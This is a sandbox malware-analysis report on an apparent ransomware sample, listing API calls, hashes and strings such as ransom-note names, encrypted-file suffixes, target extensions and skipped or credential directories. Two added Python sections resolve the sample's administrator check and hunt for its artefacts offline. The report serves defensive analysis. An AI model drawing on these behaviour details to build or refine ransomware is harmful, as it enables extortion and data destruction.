                                      • Instruction ID: 1025f225807a5fc91a54913a1d9dee568d3fb114decdbefc536b1c4f1b834f1c
                                      • Opcode Fuzzy Hash: 400664d8a97a0cfb1d7d672d43fa6e49ba770c24c0a2fea6acdb2989a5f520cf
                                      • Instruction Fuzzy Hash: 35E01234A1430CABCB00DFA5DD45B9EBBF8EB44300F5041A9D80697340DA706A489791
                                      APIs
                                      • CreateFileW.KERNEL32(00000000,00000000,?,00980F39,?,?,00000000,?,00980F39,00000000,0000000C), ref: 00980B7B
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                       • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: 7816b1dd96e3bad2896a10b720e3699d1e3781c10eb8295b6af161270aea587d
                                      • Instruction ID: b6e2ba59257b59a6c2e53af54c94b09947c89e9298ca26d2c5953a64f6c2264b
                                      • Opcode Fuzzy Hash: 7816b1dd96e3bad2896a10b720e3699d1e3781c10eb8295b6af161270aea587d
                                      • Instruction Fuzzy Hash: 0DD06C3211024DFFDF028F84DC06EDA3BAAFB48714F018000BA1856020C732E921AB90
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                       • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Name::operator+$NameName::Name::operator+=operator+
                                      • String ID: [thunk]:$`adjustor{$`local static destructor helper'$`template static data member constructor helper'$`template static data member destructor helper'$`vtordispex{$`vtordisp{$extern "C" $private: $protected: $public: $static $virtual $}'
                                      • API String ID: 3331067367-3028518216
                                      • Opcode ID: 1e200bcab36a490c480f97e2e15e37428820984b0a911e5b97f0a2540cf55514
                                      • Instruction ID: c7eda550a27dccf51212ae55024370e32963a3854190a2b807cf2e343c198fa3
                                      • Opcode Fuzzy Hash: 1e200bcab36a490c480f97e2e15e37428820984b0a911e5b97f0a2540cf55514
                                      • Instruction Fuzzy Hash: 048264B1D102099FDF19DFAAD891AEEB7B8BF44341F14452AFD16E7280EB349948CB50
                                      APIs
                                      • SetErrorMode.KERNEL32(00008003,BA3649C5), ref: 008CB78D
                                      • FindFirstFileW.KERNEL32(?,?,009AFBF8,00000002), ref: 008CB7B5
                                      • lstrcmpW.KERNEL32(?,009AFF30), ref: 008CD0FE
                                      • lstrcmpW.KERNEL32(?,009AFF34), ref: 008CD114
                                      • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 008CD3F1
                                      • FindNextFileW.KERNEL32(?,?), ref: 008CE043
                                      • FindClose.KERNEL32(?), ref: 008CE057
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                       • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Find$Filelstrcmp$CloseErrorFirstIos_base_dtorModeNextstd::ios_base::_
                                      • String ID: .1UI$.bat$.cmd$.cpl$.dll$.exe$.icl$.ico$.ini$.lnk$.log$.msi$.scr$2$Dflt$Dflt$\Application Data\Microsoft\Credentials$\Boot$\Documents and Settings\$\Documents and Settings\All Users\Start Menu$\Local Settings\Application Data\Microsoft\Credentials$\Local Settings\Temporary Internet Files$\ProgramData$\ProgramData\Microsoft$\Recovery$\Restore_Your_Files.txt$\Start Menu$\System Volume Information$\Users\All Users\Microsoft\Windows\Caches$\Users\Default\ntuser.dat$\WINDOWS$\Windows$\skips.txt$_Eg$_Enc$_Mail-$_[ID-
                                      • API String ID: 830838206-2490983636
                                      • Opcode ID: 2abc375b9a70303bd156033b0acf90420050022073450ce469dfa488f7a53dd2
                                      • Instruction ID: 81ebcbddce8460fa457ebe7761b2986520504808c0ab769241aefbf314c8684e
                                      • Opcode Fuzzy Hash: 2abc375b9a70303bd156033b0acf90420050022073450ce469dfa488f7a53dd2
                                      • Instruction Fuzzy Hash: AC333AB1E006288BDB24DF28CC95BDDB7B1FB45308F5081ADD509A7291DB74AAC5CF98
                                      APIs
                                      • lstrcmpW.KERNEL32(?,009AFF30), ref: 008CA60B
                                      • lstrcmpW.KERNEL32(?,009AFF34), ref: 008CA621
                                      • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 008CA8FE
                                      • FindNextFileW.KERNEL32(?,?), ref: 008CA956
                                      • FindClose.KERNEL32(?), ref: 008CA965
                                      • SetErrorMode.KERNEL32(00008003,BA3649C5), ref: 008CB78D
                                      • FindFirstFileW.KERNEL32(?,?,009AFBF8,00000002), ref: 008CB7B5
                                        • Part of subcall function 008B3740: __CxxThrowException@8.LIBVCRUNTIME ref: 008B376D
                                        • Part of subcall function 008B3740: __CxxThrowException@8.LIBVCRUNTIME ref: 008B37B2
                                        • Part of subcall function 008BAD70: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 008BAE4E
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                       • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Find$Exception@8FileIos_base_dtorThrowlstrcmpstd::ios_base::_$CloseErrorFirstModeNext
                                      • String ID: .1UI$.bat$.cmd$.cpl$.dll$.exe$.icl$.ico$.ini$.lnk$.log$.msi$.scr$0$5$\Restore_Your_Files.txt$_Eg$_Enc$_Mail-$_[ID-
                                      • API String ID: 420669261-2349721455
                                      • Opcode ID: dd50a193c2a9e57535665852c78df96837a14dae3a16d0bca9fd2b03f0f00331
                                      • Instruction ID: 08a21efc47120e02f38bee93f628d2093bd78865e085a00ef6cf801b59d95676
                                      • Opcode Fuzzy Hash: dd50a193c2a9e57535665852c78df96837a14dae3a16d0bca9fd2b03f0f00331
                                      • Instruction Fuzzy Hash: 82C29A71D006188ADF24DB68CC86BEEB7B1FF55309F5082A9E509E7291DB30AE85CF41
                                      APIs
                                      • GetCurrentThread.KERNEL32 ref: 008D45E3
                                      • OpenThreadToken.ADVAPI32(00000000), ref: 008D45EA
                                      • GetLastError.KERNEL32 ref: 008D45F4
                                      • GetCurrentProcess.KERNEL32(0000000A,?), ref: 008D460B
                                      • OpenProcessToken.ADVAPI32(00000000), ref: 008D4612
                                      • DuplicateToken.ADVAPI32(?,00000002,?), ref: 008D4629
                                      • AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 008D4654
                                      • LocalAlloc.KERNEL32(00000040,00000014), ref: 008D4666
                                      • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 008D467A
                                      • GetLengthSid.ADVAPI32(?), ref: 008D468B
                                      • LocalAlloc.KERNEL32(00000040,00000010), ref: 008D4697
                                      • InitializeAcl.ADVAPI32(00000000,00000010,00000002), ref: 008D46AC
                                      • AddAccessAllowedAce.ADVAPI32(?,00000002,00000003,?), ref: 008D46C4
                                      • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,?,00000000), ref: 008D46DC
                                      • SetSecurityDescriptorGroup.ADVAPI32(00000000,?,00000000), ref: 008D46EE
                                      • SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 008D46FC
                                      • IsValidSecurityDescriptor.ADVAPI32(00000000), ref: 008D4705
                                      • AccessCheck.ADVAPI32(00000000,?,00000001,00000001,?,00000014,?,00000000), ref: 008D4747
                                      • LocalFree.KERNEL32(?), ref: 008D476A
                                      • LocalFree.KERNEL32(00000000), ref: 008D4774
                                      • FreeSid.ADVAPI32(?), ref: 008D477E
                                      • CloseHandle.KERNEL32(?), ref: 008D4792
                                      • CloseHandle.KERNEL32(?), ref: 008D479C
                                      Similarity
                                      • API ID: DescriptorSecurity$Local$FreeInitializeToken$AccessAllocCloseCurrentHandleOpenProcessThread$AllocateAllowedCheckDaclDuplicateErrorGroupLastLengthOwnerValid
                                      • String ID:
                                      • API String ID: 1194227780-0
                                      • Opcode ID: a43fd61c8137cdd2a520a7bef19c5f2ee010fddb0c0f1d8ebbf615ae1c697d23
                                      • Instruction ID: df3cbebae1d4f43755f82da07d71cb5f62c4642da70b8f489975557d58020721
                                      • Opcode Fuzzy Hash: a43fd61c8137cdd2a520a7bef19c5f2ee010fddb0c0f1d8ebbf615ae1c697d23
                                      • Instruction Fuzzy Hash: 4F510971E14219ABEF109FA5DC49BAEBBB8FF09701F048126E611F6290DB74DA05DB60
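The API sequence in the record above is worth reading as a unit: OpenThreadToken with an OpenProcessToken fallback, DuplicateToken at SecurityImpersonation (the 00000002 argument, needed because AccessCheck only accepts an impersonation token), AllocateAndInitializeSid with two sub-authorities 0x20 and 0x220, a fresh security descriptor whose single ACE grants that SID access mask 3, then AccessCheck asking for access 1 against the duplicated token. That is the pre-CheckTokenMembership "is the caller a local administrator" test from Microsoft's KB118626 sample, and the two RIDs are SECURITY_BUILTIN_DOMAIN_RID and DOMAIN_ALIAS_RID_ADMINS. The script below is an added example, not code from the sample or from the report: it parses the AllocateAndInitializeSid trace line, resolves the SID to its string and binary forms, and round-trips the binary layout an analyst meets in memory dumps. The identifier authority is not visible in the trace (the first argument is a pointer), so SECURITY_NT_AUTHORITY = 5 is an assumption, as is the small well-known-SID table.

```python
import re
import struct

# Trace line copied from the AllocateAndInitializeSid entry in the API list above;
# it is the only input this example needs.
TRACE_LINE = (
    "AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,"
    "00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 008D4654"
)

# Assumption: the first argument points to a SID_IDENTIFIER_AUTHORITY whose value
# the trace does not show; SECURITY_NT_AUTHORITY (5) is assumed because RIDs 0x20
# (SECURITY_BUILTIN_DOMAIN_RID) and 0x220 (DOMAIN_ALIAS_RID_ADMINS) live under it.
SECURITY_NT_AUTHORITY = 5

# Small, assumed subset of well-known SIDs, enough to name what the trace resolves to.
WELL_KNOWN = {
    "S-1-1-0": "Everyone",
    "S-1-5-18": "NT AUTHORITY\\SYSTEM",
    "S-1-5-32-544": "BUILTIN\\Administrators",
    "S-1-5-32-545": "BUILTIN\\Users",
}


def parse_allocate_and_initialize_sid(line):
    """Extract the sub-authority RIDs from a sandbox API trace line.

    Argument order follows the Win32 prototype: (pIdentifierAuthority,
    nSubAuthorityCount, dwSubAuthority0..7, pSid).  Values are hex in the trace.
    """
    m = re.search(r"AllocateAndInitializeSid\.\w+\(([^)]*)\)", line)
    if m is None:
        raise ValueError("not an AllocateAndInitializeSid trace line")
    args = [a.strip() for a in m.group(1).split(",")]
    count = int(args[1], 16)
    if not 1 <= count <= 8:
        raise ValueError("sub-authority count out of range: %d" % count)
    return [int(a, 16) for a in args[2:2 + count]]


def sid_to_string(authority, subs):
    return "S-1-%d-%s" % (authority, "-".join(str(s) for s in subs))


def sid_to_bytes(authority, subs):
    """Serialise to the binary SID layout found in memory dumps and ACLs:
    Revision (1) | SubAuthorityCount (1) | IdentifierAuthority (6, big-endian)
    | SubAuthority[0..n-1] (4 bytes each, little-endian)."""
    if not 1 <= len(subs) <= 15:
        raise ValueError("a SID carries 1..15 sub-authorities")
    return (bytes([1, len(subs)]) + authority.to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def sid_from_bytes(blob):
    """Inverse of sid_to_bytes; checks the length against the count byte."""
    if len(blob) < 8 or blob[0] != 1:
        raise ValueError("not a revision-1 SID")
    count = blob[1]
    if len(blob) != 8 + 4 * count:
        raise ValueError("length does not match sub-authority count")
    authority = int.from_bytes(blob[2:8], "big")
    subs = list(struct.unpack("<%dI" % count, blob[8:]))
    return authority, subs


def describe_trace(line, authority=SECURITY_NT_AUTHORITY):
    """Resolve a trace line to {sid, name, binary(hex)} for a triage note."""
    subs = parse_allocate_and_initialize_sid(line)
    sid = sid_to_string(authority, subs)
    return {"sid": sid,
            "name": WELL_KNOWN.get(sid, "(not in table)"),
            "binary": sid_to_bytes(authority, subs).hex()}


if __name__ == "__main__":
    print(describe_trace(TRACE_LINE))
```

The binary form matters when the same SID turns up elsewhere in the dump (for example inside a DACL the sample builds) without the API name next to it; searching for the 16-byte pattern finds it where string searches for "544" do not.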
                                      Similarity
                                      • API ID:
                                      • String ID: \Application Data\Microsoft\Credentials$\Boot$\Documents and Settings\$\Documents and Settings\All Users\Start Menu$\Local Settings\Application Data\Microsoft\Credentials$\Local Settings\Temporary Internet Files$\ProgramData$\ProgramData\Microsoft$\Recovery$\Start Menu$\System Volume Information$\Users\All Users\Microsoft\Windows\Caches$\WINDOWS$\Windows$\skips.txt
                                      • API String ID: 0-3363970923
                                      • Opcode ID: f4b2573a663b82a37f2b8074a9e11304551636d20c73c6c5ab8eef3b32d77a03
                                      • Instruction ID: 7a75a9c1c1fa9251f66d767a1c1c54f46ccb2b63db30b527df80b860d4a7518b
                                      • Opcode Fuzzy Hash: f4b2573a663b82a37f2b8074a9e11304551636d20c73c6c5ab8eef3b32d77a03
                                      • Instruction Fuzzy Hash: 14623470E00618CFDF14CF68CC95B9EB7B1FB59305F1186A9D449A7290EB74AA88CF91
                                      APIs
                                        • Part of subcall function 008B3740: __CxxThrowException@8.LIBVCRUNTIME ref: 008B376D
                                        • Part of subcall function 008B3740: __CxxThrowException@8.LIBVCRUNTIME ref: 008B37B2
                                      • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 008C895A
                                      Similarity
                                      • API ID: Exception@8Throw$Ios_base_dtorstd::ios_base::_
                                      • String ID: &4r*3d$($.1UI$77H75$_Mail-$_[ID-$vj10au=$vj20au=$vj30au=$vj51au=$vj55au=$vjau=$wenf=
                                      • API String ID: 2823994529-359758777
                                      • Opcode ID: 68c37d1bcc2a7368c04239675b74158e475d5ca48333fe657fd232666aaf5e41
                                      • Instruction ID: ccfbb005ffcc51655674471c53e7e55f23a4b97c7a80e59a142416afad8493b0
                                      • Opcode Fuzzy Hash: 68c37d1bcc2a7368c04239675b74158e475d5ca48333fe657fd232666aaf5e41
                                      • Instruction Fuzzy Hash: A9A2BD31A14258CBDB24CF68CC55BDDBBB2FF85318F10429DE449AB2A1DB35AA84CF51
                                      Similarity
                                      • API ID:
                                      • String ID: '$.1UI$77H75$_Mail-$_[ID-$boot.ini$bootmgr$bootsect.bak$desktop.ini$nqpso5938fh71jfu$r_cfg.ini$restore_your_files.txt$sysmain.sys$xinfecter.exe
                                      • API String ID: 0-2108258418
                                      • Opcode ID: 169e404db6fa7e74ad84b15c5a1e8e432a6631ee6a3de8344e864dc2fbcf906b
                                      • Instruction ID: eab962e9bbc25d122bb0f6a0d4d708d52447795966a8664955c0c73c892a03b4
                                      • Opcode Fuzzy Hash: 169e404db6fa7e74ad84b15c5a1e8e432a6631ee6a3de8344e864dc2fbcf906b
                                      • Instruction Fuzzy Hash: 15B237309106688ADB29DB28CC95BEEB7B5FF95304F1442E9D00DA7292EB749B85CF41
                                      APIs
                                      • GetModuleHandleW.KERNEL32(kernel32,GetLogicalProcessorInformation,?), ref: 008C62BA
                                      • GetProcAddress.KERNEL32(00000000), ref: 008C62C1
                                      • GetLastError.KERNEL32 ref: 008C62FF
                                      Strings
                                      • GetLogicalProcessorInformation, xrefs: 008C629C
                                      • Error: Allocation failure, xrefs: 008C632D
                                      • kernel32, xrefs: 008C62A1
                                      • GetLogicalProcessorInformation is not supported., xrefs: 008C62CF
                                      • Error %d, xrefs: 008C634E
                                      Similarity
                                      • API ID: AddressErrorHandleLastModuleProc
                                      • String ID: Error %d$Error: Allocation failure$GetLogicalProcessorInformation is not supported.$GetLogicalProcessorInformation$kernel32
                                      • API String ID: 4275029093-3269863577
                                      • Opcode ID: 25cdb2f9c65835cdd2ab7d2c4bc25b6cc5905efa8c136cca84940b62ea373595
                                      • Instruction ID: 7854c514726399678817329f756ceec669537615aa83e0c9465eef5d6ff2843a
                                      • Opcode Fuzzy Hash: 25cdb2f9c65835cdd2ab7d2c4bc25b6cc5905efa8c136cca84940b62ea373595
                                      • Instruction Fuzzy Hash: 0471EF31A147458BD7189B28DC42B6EB3E1FFC4324F444A2DF886C7291EB74E9958B82
                                      Similarity
                                      • API ID:
                                      • String ID: Auth$Cent$Genu$Hygo$auls$aurH$cAMD$enti$ineI$nGen$ntel$uine
                                      • API String ID: 0-2607262942
                                      • Opcode ID: ebc0ea91698a2db08f6b699a7a703975c1db3e43518fe3945f6d526348411c88
                                      • Instruction ID: 52e15d4eea86310ded9d49f76eb1acbe6eaebb889d3651b3695869b8c6273ba7
                                      • Opcode Fuzzy Hash: ebc0ea91698a2db08f6b699a7a703975c1db3e43518fe3945f6d526348411c88
                                      • Instruction Fuzzy Hash: F391397151D3A18FD729CF28E8413ABBBD4AB75300F04892EE8DA97397C625D984DB42
                                      APIs
                                        • Part of subcall function 00946173: Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 00946186
                                      • Concurrency::details::ResourceManager::PreProcessDynamicAllocationData.LIBCONCRT ref: 00944AF6
                                        • Part of subcall function 00946286: Concurrency::details::ResourceManager::HandleBorrowedCores.LIBCONCRT ref: 009462B0
                                        • Part of subcall function 00946286: Concurrency::details::ResourceManager::HandleSharedCores.LIBCONCRT ref: 0094631F
                                      • Concurrency::details::ResourceManager::IncreaseFullyLoadedSchedulerAllocations.LIBCMT ref: 00944C28
                                      • Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 00944C88
                                      • Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 00944C94
                                      • Concurrency::details::ResourceManager::DistributeExclusiveCores.LIBCONCRT ref: 00944CCF
                                      • Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 00944CF0
                                      • Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 00944CFC
                                      • Concurrency::details::ResourceManager::DistributeIdleCores.LIBCONCRT ref: 00944D05
                                      • Concurrency::details::ResourceManager::ResetGlobalAllocationData.LIBCMT ref: 00944D1D
                                      Similarity
                                      • API ID: Concurrency::details::Manager::Resource$AllocationCores$Dynamic$AdjustCoreDataDistributeHandlePrepareReceiversTransfer$AllocationsBorrowedBuffersExclusiveFullyGlobalIdleIncreaseInitializeLoadedProcessResetSchedulerShared
                                      • String ID:
                                      • API String ID: 2508902052-0
                                      • Opcode ID: 6205ff1eeeaee0cf79450def734d6f74160819ef6e24cea2f90ec9e8164c7a4b
                                      • Instruction ID: 2e854fb7a3bd859dba151096f8409bcca456b18a6c3b2b225ea7fe3546052451
                                      • Opcode Fuzzy Hash: 6205ff1eeeaee0cf79450def734d6f74160819ef6e24cea2f90ec9e8164c7a4b
                                      • Instruction Fuzzy Hash: C68139B1E006269FCB19DFA8C5C0B6DB7B6FF88305B2586A9D845A7701C770ED52CB90
                                      APIs
                                        • Part of subcall function 008B5130: CreateSemaphoreA.KERNEL32(00000000,00000000,7FFFFFFF,00000000), ref: 008B5198
                                        • Part of subcall function 008B5130: CreateSemaphoreA.KERNEL32(00000000,00000000,7FFFFFFF,00000000), ref: 008B51AC
                                        • Part of subcall function 008B5130: CreateSemaphoreA.KERNEL32(00000000,00000000,7FFFFFFF,00000000), ref: 008B51C0
                                      • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 008CF6C4
                                      • PathIsNetworkPathA.SHLWAPI(00000000,?,00000002,-00000015,BA3649C5), ref: 008CF76F
                                      • PathIsNetworkPathA.SHLWAPI(00000000,?,00000002,-00000015,BA3649C5), ref: 008CF785
                                      • PathIsNetworkPathA.SHLWAPI(00000000,?,00000002,-00000015,BA3649C5), ref: 008CF7A4
                                      • PathIsNetworkPathA.SHLWAPI(00000000,?,00000002,-00000015,BA3649C5), ref: 008CF7BB
                                      Similarity
                                      • API ID: Path$Network$CreateSemaphore$Ios_base_dtorstd::ios_base::_
                                      • String ID: X$\Restore_Your_Files.txt
                                      • API String ID: 3524565764-1189399128
                                      • Opcode ID: ab31f94c467c4d951b58097ceb7ef2ce757b279666bc3e7092ac99e5e10dea57
                                      • Instruction ID: 583c6fdc52dfebbaab5802c6422010bc79bf5d15c0ae38c7090a4591647a7cfa
                                      • Opcode Fuzzy Hash: ab31f94c467c4d951b58097ceb7ef2ce757b279666bc3e7092ac99e5e10dea57
                                      • Instruction Fuzzy Hash: BF62BD71E002589BDF14DB68C985BDDBBB5FF45304F6441ADE809A7282DB70AE84CF91
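Four records in this section carry the sample's file-system vocabulary: the Find/lstrcmp record whose strings hold the extension list (.bat, .cmd, .cpl, .dll, .exe, .icl, .ico, .ini, .lnk, .log, .msi, .scr) together with \Restore_Your_Files.txt and the fragments _[ID- and _Mail-; the record listing directory fragments (\Windows, \Boot, \Recovery, \ProgramData\Microsoft, \System Volume Information and so on, plus \skips.txt); the record listing file names (boot.ini, bootmgr, bootsect.bak, desktop.ini, r_cfg.ini, restore_your_files.txt, sysmain.sys, xinfecter.exe); and the PathIsNetworkPathA record above that again carries the note name. Read together they look like a directory walker's exclusion lists plus the artefacts the sample writes. The script below is an added triage example, not code from the sample or the report: it walks a tree offline, reports ransom notes, the sample's own files and file names that carry both renaming fragments, and flags any hit that sits under a directory the sample's list names. Assumptions, also marked in the code: that the directory list is an exclusion list, that _[ID- and _Mail- belong to the suffix appended to encrypted files, and that plain substring comparison mirrors the walker's string checks; the extension list is left out because the page does not say what the sample does with it. The test tree is constructed, not data from the report.

```python
import os
import tempfile

# Names below are copied from the sample's string tables in this report.  The
# comparisons are case-insensitive because the tables carry both
# "Restore_Your_Files.txt" and "restore_your_files.txt".
RANSOM_NOTE = "restore_your_files.txt"
SAMPLE_FILES = {"r_cfg.ini", "skips.txt", "xinfecter.exe"}

# Assumption: "_[ID-" and "_Mail-" are fragments of the suffix the sample appends
# to files it has encrypted; the report shows only the fragments.
ENCRYPTED_MARKERS = ("_[id-", "_mail-")

# Path fragments the sample's directory walker compares against.  Assumption:
# this is its exclusion list, i.e. the places it leaves untouched.
EXCLUDED_DIR_FRAGMENTS = [
    "\\windows", "\\boot", "\\recovery", "\\programdata\\microsoft",
    "\\system volume information", "\\documents and settings\\",
    "\\application data\\microsoft\\credentials",
    "\\local settings\\temporary internet files",
    "\\users\\all users\\microsoft\\windows\\caches", "\\start menu",
]


def classify(name):
    """Map a bare file name to the artefact class it matches, or None."""
    low = name.lower()
    if low == RANSOM_NOTE:
        return "ransom_note"
    if low in SAMPLE_FILES:
        return "sample_file"
    if all(marker in low for marker in ENCRYPTED_MARKERS):
        return "encrypted_name"
    return None


def in_excluded_location(rel_path):
    """True if the path lies under a directory the sample's walker skips.

    Substring matching on a backslash-normalised path is an assumption that
    mirrors the plain string comparisons an lstrcmp-based walker would make."""
    win = "\\" + rel_path.replace(os.sep, "\\").replace("/", "\\").lower()
    return any(fragment in win for fragment in EXCLUDED_DIR_FRAGMENTS)


def hunt(root):
    """Walk `root` and return every file matching a known artefact class.

    A hit inside an excluded location is flagged: an encrypted name under
    \\Windows would contradict the static exclusion list and deserves a look."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            kind = classify(fname)
            if kind is None:
                continue
            rel = os.path.relpath(os.path.join(dirpath, fname), root)
            hits.append({"path": rel, "kind": kind,
                         "excluded_location": in_excluded_location(rel)})
    return sorted(hits, key=lambda h: h["path"])


def build_sample_tree():
    """Constructed test tree (not data from the report) so the hunt runs offline."""
    root = tempfile.mkdtemp(prefix="rcru64_hunt_")
    layout = {
        "Users/bob/Documents/report.docx_[ID-AAAA]_Mail-x@example.invalid": "enc",
        "Users/bob/Documents/Restore_Your_Files.txt": "note",
        "Users/bob/Documents/notes.txt": "plain",
        "Windows/System32/skips.txt": "cfg",
    }
    for rel, content in layout.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    for hit in hunt(build_sample_tree()):
        print(hit)
```

Run it against a mounted image or a share export rather than a live host: the walker deliberately does not honour the sample's exclusions, since the point is to find artefacts wherever they landed and to notice when one lands somewhere the static evidence says it should not.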
                                      APIs
                                      • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 009443F8
                                      • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00944444
                                        • Part of subcall function 00945B3D: Concurrency::details::GlobalCore::Initialize.LIBCONCRT ref: 00945C30
                                      • Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 009444B0
                                      • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 009444CC
                                      • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00944520
                                      • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 0094454D
                                      • Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 009445A3
                                      Similarity
                                      • API ID: Concurrency::details::$GlobalInitialize$Node::$AffinityManager::Resource$CleanupCore::FindGroupInformationRestriction::Topology
                                      • String ID:
                                      • API String ID: 2943730970-0
                                      • Opcode ID: 6d7c8e8a7410346e870b3ff2d89b5e35572235ac21958dae223f2bb758a4484d
                                      • Instruction ID: 7d23af7a45cd5c079f2946f2561caef6e3cb60bcc9d5622068dd91645e8eb72b
                                      • Opcode Fuzzy Hash: 6d7c8e8a7410346e870b3ff2d89b5e35572235ac21958dae223f2bb758a4484d
                                      • Instruction Fuzzy Hash: A8B16CB0A01615AFDB18CF68C981B7AB7F8FF44300F24816EE805AB295D734ED91CB90
                                      Similarity
                                      • API ID: __floor_pentium4
                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                      • API String ID: 4168288129-2761157908
                                      • Opcode ID: 020462869ab2dad9c2007924ace91491f10c3c730b5bdcba2a6e7572f42d91ca
                                      • Instruction ID: 6f0ee91f25cb78c7914e2c6634cfd0a3536999155fb1e7b445e1f5c99a0153b4
                                      • Opcode Fuzzy Hash: 020462869ab2dad9c2007924ace91491f10c3c730b5bdcba2a6e7572f42d91ca
                                      • Instruction Fuzzy Hash: 4CC24B71E086298FDB25DF28DD407E9B7B9EB84304F1545EAD84DE7241E778AE828F40
                                      APIs
                                      • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 009535B6
                                        • Part of subcall function 0094D317: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 0094D338
                                      • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 0095361C
                                      • Concurrency::details::WorkItem::ResolveToken.LIBCONCRT ref: 00953634
                                      • Concurrency::details::WorkItem::BindTo.LIBCONCRT ref: 00953641
                                        • Part of subcall function 009530E1: Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 00953109
                                        • Part of subcall function 009530E1: Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 009531A1
                                        • Part of subcall function 009530E1: Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 009531AB
